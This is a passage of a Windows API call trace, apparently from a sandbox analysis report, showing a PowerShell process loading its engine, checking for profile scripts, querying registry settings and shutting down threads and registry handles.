lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.426] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.427] VirtualQuery (in: lpAddress=0x24cf30, lpBuffer=0x24df30, dwLength=0x1c | out: lpBuffer=0x24df30*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.429] GetLastError () returned 0xcb [0030.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.430] GetLastError () returned 0xcb [0030.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.430] GetLastError () returned 0xcb [0030.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.430] GetLastError () returned 0xcb [0030.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.431] GetLastError () returned 0xcb [0030.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.431] GetLastError () returned 0xcb [0030.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.444] GetLastError () returned 0xcb [0030.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.444] GetLastError () returned 0xcb [0030.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.444] GetLastError () returned 0xcb [0030.445] VirtualQuery (in: lpAddress=0x24d258, lpBuffer=0x24e258, dwLength=0x1c | out: lpBuffer=0x24e258*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.445] GetLastError () returned 0xcb [0030.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.445] GetLastError () returned 0xcb [0030.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dcdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0030.445] GetLastError () returned 0xcb [0030.445] VirtualQuery (in: lpAddress=0x24d250, lpBuffer=0x24e250, dwLength=0x1c | out: lpBuffer=0x24e250*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.446] VirtualQuery (in: lpAddress=0x24cf04, lpBuffer=0x24df04, dwLength=0x1c | out: lpBuffer=0x24df04*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.446] VirtualQuery (in: lpAddress=0x24cf04, lpBuffer=0x24df04, dwLength=0x1c | out: lpBuffer=0x24df04*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e98c | out: phkResult=0x24e98c*=0x37c) returned 0x0 [0030.447] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e9d4, lpData=0x0, lpcbData=0x24e9d0*=0x0 | out: lpType=0x24e9d4*=0x1, lpData=0x0, lpcbData=0x24e9d0*=0x56) returned 0x0 [0030.447] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e9d4, lpData=0xd2630, lpcbData=0x24e9d0*=0x56 | out: lpType=0x24e9d4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e9d0*=0x56) returned 0x0 [0030.447] RegCloseKey (hKey=0x37c) returned 0x0 [0030.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e98c | out: phkResult=0x24e98c*=0x37c) returned 0x0 [0030.447] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e9d4, lpData=0x0, lpcbData=0x24e9d0*=0x0 | out: lpType=0x24e9d4*=0x1, lpData=0x0, lpcbData=0x24e9d0*=0x56) returned 0x0 [0030.447] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e9d4, lpData=0xd2630, lpcbData=0x24e9d0*=0x56 | out: lpType=0x24e9d4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e9d0*=0x56) returned 0x0 [0030.447] RegCloseKey (hKey=0x37c) returned 0x0 [0030.447] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xd2630 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0030.447] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0030.447] GetLastError () returned 0x3f0 [0030.448] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xd2630 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0030.448] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0030.448] GetLastError () returned 0x3f0 [0030.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0030.448] GetLastError () returned 0x3f0 [0030.448] SetErrorMode (uMode=0x1) returned 0x1 [0030.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24ea3c | out: lpFileInformation=0x24ea3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0030.449] GetLastError () returned 0x2 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0030.449] GetLastError () returned 0x2 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24ea3c | out: lpFileInformation=0x24ea3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0030.449] GetLastError () returned 0x2 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.449] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x40 [0030.449] GetLastError () returned 0x2 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24ea3c | out: lpFileInformation=0x24ea3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0030.449] GetLastError () returned 0x3 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.449] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x55 [0030.449] GetLastError () returned 0x3 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24ea3c | out: lpFileInformation=0x24ea3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0030.449] GetLastError () returned 0x3 [0030.449] SetErrorMode (uMode=0x1) returned 0x1 [0030.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.450] GetLastError () returned 0xcb [0030.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.450] GetLastError () returned 0xcb [0030.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.451] GetLastError () returned 0xcb [0030.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.451] GetLastError () returned 0xcb [0030.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.452] GetLastError () returned 0xcb [0030.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.453] GetLastError () returned 0xcb [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x380 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a8 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304 [0030.454] GetLastError () returned 0x0 [0030.454] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324 [0030.454] GetLastError () returned 0x0 [0030.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.455] GetLastError () returned 0xcb [0030.456] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0030.456] GetLastError () returned 0xcb [0030.457] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24ea7c | out: lpMode=0x24ea7c) returned 1 [0030.457] GetLastError () returned 0xcb [0030.457] SetEvent (hEvent=0x388) returned 1 [0030.457] GetLastError () returned 0xcb [0030.457] SetEvent (hEvent=0x37c) returned 1 [0030.457] GetLastError () returned 0xcb [0030.457] SetEvent (hEvent=0x380) returned 1 [0030.457] GetLastError () returned 0xcb [0030.457] SetEvent (hEvent=0x384) returned 1 [0030.457] GetLastError () returned 0xcb [0030.457] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334 [0030.458] GetLastError () returned 0x0 [0030.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0030.458] GetLastError () returned 0xcb [0030.458] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e8e0 | out: phkResult=0x24e8e0*=0x338) returned 0x0 [0030.458] RegQueryValueExW (in: hKey=0x338, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24e928, lpData=0x0, lpcbData=0x24e924*=0x0 | out: lpType=0x24e928*=0x0, lpData=0x0, lpcbData=0x24e924*=0x0) returned 0x2 [0047.600] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x580 [0047.600] GetLastError () returned 0x0 [0047.600] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x558 [0047.600] GetLastError () returned 0x0 [0047.600] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x554 [0047.600] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4c4 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x40c [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x400 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x524 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f8 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x574 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x58c [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x590 [0047.601] GetLastError () returned 0x0 [0047.601] SetEvent (hEvent=0x4c4) returned 1 [0047.601] GetLastError () returned 0x0 [0047.601] SetEvent (hEvent=0x580) returned 1 [0047.601] GetLastError () returned 0x0 [0047.601] SetEvent (hEvent=0x558) returned 1 [0047.601] GetLastError () returned 0x0 [0047.601] SetEvent (hEvent=0x554) returned 1 [0047.601] GetLastError () returned 0x0 [0047.601] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x594 [0047.601] GetLastError () returned 0x0 [0047.602] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e914 | out: phkResult=0x24e914*=0x59c) returned 0x0 [0047.602] RegQueryValueExW (in: hKey=0x59c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24e95c, lpData=0x0, lpcbData=0x24e958*=0x0 | out: lpType=0x24e95c*=0x0, lpData=0x0, lpcbData=0x24e958*=0x0) returned 0x2 [0047.780] SetEvent (hEvent=0x40c) returned 1 [0047.780] GetLastError () returned 0x0 [0047.780] SetEvent (hEvent=0x400) returned 1 [0047.780] GetLastError () returned 0x0 [0047.780] SetEvent (hEvent=0x524) returned 1 [0047.780] GetLastError () returned 0x0 [0047.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0047.786] GetLastError () returned 0xcb [0047.792] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb5c60, nSize=0x24e9f0 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x24e9f0) returned 0x1 [0047.793] GetLastError () returned 0xcb [0047.793] GetUserNameW (in: lpBuffer=0xd2630, pcbBuffer=0x24e9f8 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x24e9f8) returned 1 [0047.793] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x21cb328*="Stopped", lpRawData=0x21cb1e4) returned 1 [0047.794] GetLastError () returned 0x0 [0047.794] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0047.794] GetLastError () returned 0x0 [0047.796] CoGetContextToken (in: pToken=0x24f728 | out: pToken=0x24f728) returned 0x0 [0047.796] IUnknown:QueryInterface (in: This=0x89258, riid=0x633b3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24f75c | out: ppvObject=0x24f75c*=0x89264) returned 0x0 [0047.796] IComThreadingInfo:GetCurrentThreadType (in: This=0x89264, pThreadType=0x24f7cc | out: pThreadType=0x24f7cc*=0) returned 0x0 [0047.796] IUnknown:Release (This=0x89264) returned 0x1 [0047.797] CoGetContextToken (in: pToken=0x24f500 | out: pToken=0x24f500) returned 0x0 [0047.797] IUnknown:QueryInterface (in: This=0x89258, riid=0x633b3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24f534 | out: ppvObject=0x24f534*=0x89264) returned 0x0 [0047.797] IComThreadingInfo:GetCurrentThreadType (in: This=0x89264, pThreadType=0x24f568 | out: pThreadType=0x24f568*=0) returned 0x0 [0047.797] IUnknown:Release (This=0x89264) returned 0x1 [0047.803] CoGetContextToken (in: pToken=0x24f500 | out: pToken=0x24f500) returned 0x0 [0047.803] IUnknown:QueryInterface (in: This=0x89258, riid=0x633b3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24f534 | out: ppvObject=0x24f534*=0x89264) returned 0x0 [0047.803] IComThreadingInfo:GetCurrentThreadType (in: This=0x89264, pThreadType=0x24f568 | out: pThreadType=0x24f568*=0) returned 0x0 [0047.803] IUnknown:Release (This=0x89264) returned 0x1 [0047.808] CoGetContextToken (in: pToken=0x24f500 | out: pToken=0x24f500) returned 0x0 [0047.808] IUnknown:QueryInterface (in: This=0x89258, riid=0x633b3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24f534 | out: ppvObject=0x24f534*=0x89264) returned 0x0 [0047.808] IComThreadingInfo:GetCurrentThreadType (in: This=0x89264, pThreadType=0x24f568 | out: pThreadType=0x24f568*=0) returned 0x0 [0047.808] IUnknown:Release (This=0x89264) returned 0x1 [0047.837] CoGetContextToken (in: pToken=0x24f4e0 | out: pToken=0x24f4e0) returned 0x0 [0047.837] IUnknown:QueryInterface (in: This=0x89258, riid=0x633b3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x24f514 | out: ppvObject=0x24f514*=0x89264) returned 0x0 [0047.837] IComThreadingInfo:GetCurrentThreadType (in: This=0x89264, pThreadType=0x24f548 | out: pThreadType=0x24f548*=0) returned 0x0 [0047.837] IUnknown:Release (This=0x89264) returned 0x0 [0047.838] CoUninitialize () Thread: id = 15 os_tid = 0xa80 Thread: id = 16 os_tid = 0xa84 Thread: id = 17 os_tid = 0xa88 Thread: id = 18 os_tid = 0xa8c Thread: id = 19 os_tid = 0xa90 Thread: id = 20 os_tid = 0xa94 [0025.168] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0029.133] LocalFree (hMem=0x974b0) returned 0x0 [0029.133] GetLastError () returned 0x0 [0029.133] CloseHandle (hObject=0x324) returned 1 [0029.134] GetLastError () returned 0x0 [0029.134] CloseHandle (hObject=0x13) returned 1 [0029.134] GetLastError () returned 0x0 [0029.134] CloseHandle (hObject=0xf) returned 1 [0029.134] GetLastError () returned 0x0 [0029.134] RegCloseKey (hKey=0x308) returned 0x0 [0029.134] RegCloseKey (hKey=0x304) returned 0x0 [0029.134] RegCloseKey (hKey=0x300) returned 0x0 [0029.135] LocalFree (hMem=0x974c0) returned 0x0 [0029.135] GetLastError () returned 0x0 [0029.135] RegCloseKey (hKey=0x330) returned 0x0 [0029.954] RegCloseKey (hKey=0x370) returned 0x0 [0029.954] RegCloseKey (hKey=0x36c) returned 0x0 [0029.955] RegCloseKey (hKey=0x368) returned 0x0 [0029.955] RegCloseKey (hKey=0x364) returned 0x0 [0029.955] RegCloseKey (hKey=0x360) returned 0x0 [0029.955] RegCloseKey (hKey=0x35c) returned 0x0 [0029.955] RegCloseKey (hKey=0x358) returned 0x0 [0029.955] RegCloseKey (hKey=0x3a0) returned 0x0 [0029.955] RegCloseKey (hKey=0x39c) returned 0x0 [0029.956] RegCloseKey (hKey=0x348) returned 0x0 [0029.956] RegCloseKey (hKey=0x344) returned 0x0 [0029.956] RegCloseKey (hKey=0x340) returned 0x0 [0029.956] RegCloseKey (hKey=0x33c) returned 0x0 [0029.956] RegCloseKey (hKey=0x338) returned 0x0 [0029.956] RegCloseKey (hKey=0x334) returned 0x0 [0029.956] RegCloseKey (hKey=0x324) returned 0x0 [0029.957] RegCloseKey (hKey=0x304) returned 0x0 [0029.957] RegCloseKey (hKey=0x300) returned 0x0 [0029.957] RegCloseKey (hKey=0x398) returned 